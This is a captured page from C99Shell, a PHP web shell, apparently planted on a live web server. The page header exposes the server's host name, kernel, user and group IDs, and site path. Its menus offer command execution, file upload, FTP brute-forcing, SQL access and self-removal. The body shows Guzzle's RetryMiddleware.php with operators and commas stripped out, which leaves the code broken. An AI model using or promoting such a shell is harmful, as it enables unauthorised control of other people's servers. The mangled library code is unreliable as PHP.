!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/multirest.picotech.app/public_html/vendor/guzzlehttp/guzzle/src/   drwxr-xr-x
Free 28.55 GB of 117.98 GB (24.2%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     RetryMiddleware.php (3.52 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace GuzzleHttp;

use 
GuzzleHttp\Promise as P;
use 
GuzzleHttp\Promise\PromiseInterface;
use 
Psr\Http\Message\RequestInterface;
use 
Psr\Http\Message\ResponseInterface;

/**
 * Middleware that retries requests based on the boolean result of
 * invoking the provided "decider" function.
 *
 * @final
 */
class RetryMiddleware
{
    
/**
     * @var callable(RequestInterface, array): PromiseInterface
     */
    
private $nextHandler;

    
/**
     * @var callable
     */
    
private $decider;

    
/**
     * @var callable(int)
     */
    
private $delay;

    
/**
     * @param callable                                            $decider     Function that accepts the number of retries,
     *                                                                         a request, [response], and [exception] and
     *                                                                         returns true if the request is to be
     *                                                                         retried.
     * @param callable(RequestInterface, array): PromiseInterface $nextHandler Next handler to invoke.
     * @param (callable(int): int)|null                           $delay       Function that accepts the number of retries
     *                                                                         and returns the number of
     *                                                                         milliseconds to delay.
     */
    
public function __construct(callable $decider, callable $nextHandler, callable $delay null)
    {
        
$this->decider $decider;
        
$this->nextHandler $nextHandler;
        
$this->delay $delay ?: __CLASS__ '::exponentialDelay';
    }

    
/**
     * Default exponential backoff delay function.
     *
     * @return int milliseconds.
     */
    
public static function exponentialDelay(int $retries): int
    
{
        return (int) 
\pow(2$retries 1) * 1000;
    }

    public function 
__invoke(RequestInterface $request, array $options): PromiseInterface
    
{
        if (!isset(
$options['retries'])) {
            
$options['retries'] = 0;
        }

        
$fn $this->nextHandler;
        return 
$fn($request$options)
            ->
then(
                
$this->onFulfilled($request$options),
                
$this->onRejected($request$options)
            );
    }

    
/**
     * Execute fulfilled closure
     */
    
private function onFulfilled(RequestInterface $request, array $options): callable
    {
        return function (
$value) use ($request$options) {
            if (!(
$this->decider)(
                
$options['retries'],
                
$request,
                
$value,
                
null
            
)) {
                return 
$value;
            }
            return 
$this->doRetry($request$options$value);
        };
    }

    
/**
     * Execute rejected closure
     */
    
private function onRejected(RequestInterface $req, array $options): callable
    {
        return function (
$reason) use ($req$options) {
            if (!(
$this->decider)(
                
$options['retries'],
                
$req,
                
null,
                
$reason
            
)) {
                return 
P\Create::rejectionFor($reason);
            }
            return 
$this->doRetry($req$options);
        };
    }

    private function 
doRetry(RequestInterface $request, array $optionsResponseInterface $response null): PromiseInterface
    
{
        
$options['delay'] = ($this->delay)(++$options['retries'], $response);

        return 
$this($request$options);
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0039 ]--